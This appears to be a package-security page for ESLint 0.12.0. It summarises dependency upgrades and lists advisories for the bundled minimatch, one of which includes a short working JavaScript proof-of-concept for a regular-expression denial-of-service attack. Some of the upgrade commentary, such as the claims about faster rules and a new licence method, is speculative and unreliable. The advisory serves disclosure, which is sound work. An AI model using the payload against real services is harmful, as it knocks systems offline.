ESLint 0.12.0 brings several updates compared to version 0.11.0. A notable change is in the core's underlying parser, with espree updated from version 1.4.0 to version 1.6.0, potentially impacting how JavaScript code is parsed and analyzed for linting. The debug dependency also sees an upgrade, moving from version 2.0.0 to version 2.1.1, which may affect debugging capabilities within ESLint. Furthermore, the dependency on estraverse jumps from ~1.5.1 to ^1.9.1, indicating improvements in Abstract Syntax Tree (AST) traversal performance and potentially compatibility with newer JavaScript syntax. Object-assign had a upgrade of the version as well from 1.0.0 to 2.0.0. Minimatch has also been upgraded from 1.0.0 to 2.0.1
For developers, ESLint 0.12.0 offers potentially enhanced performance through the updated dependencies. The shift to a newer version of espree means better parsing of modern JavaScript code. Developers should be aware that these dependency upgrades might introduce subtle changes in how code is linted. Specifically, the update to estraverse could mean faster rule execution. Developers using advanced or experimental JavaScript features should particularly benefit from this release. Additionally, the release integrates a new method of license. The upgrade in object-assign might impact developers relying on specific object-assign behaviors. Consider testing your existing ESLint configurations with version 0.12.0 to ensure compatibility and leverage the improvements.
All the vulnerabilities related to the version 0.12.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.